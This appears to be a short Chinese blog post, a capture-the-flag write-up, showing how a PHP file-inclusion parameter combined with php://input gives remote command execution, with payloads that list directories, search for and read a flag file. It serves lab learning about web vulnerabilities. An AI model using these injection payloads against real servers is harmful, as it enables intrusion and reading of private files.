RCE-远程包含

打开题目

查看内容

“我没有shell,你怎么取flag?”
打开便是一个phpinfo()

尝试file

用file包含phpinfo是有回显的
?/file=php://input

<?php phpinfo(); ?>

所以构造payload :
?file=php://input
<?php system(‘ls’);?>查看当前目录
结果如下:

<?php system(‘ls /‘); ?>查看上级目录

<?php system(‘cat /flag’); ?>查看flag内容

———

直接搜索、查看
?file=php://input

<?php system(‘find / -name flag’); ?> 查找名称为flag的文件

?file=php://input
<?php system(‘find / -name flag*’); ?> 查找名称包含flag的文件
<?php system(‘cat /flag’); ?> 查看flag内容


本文作者: Alone
本文链接: https://blog.nosecurity.cn/posts/64920.html
版权声明: 本博客所有文章除特别声明外,均为原创,采用 CC BY-SA 4.0 协议 ,转载请注明出处!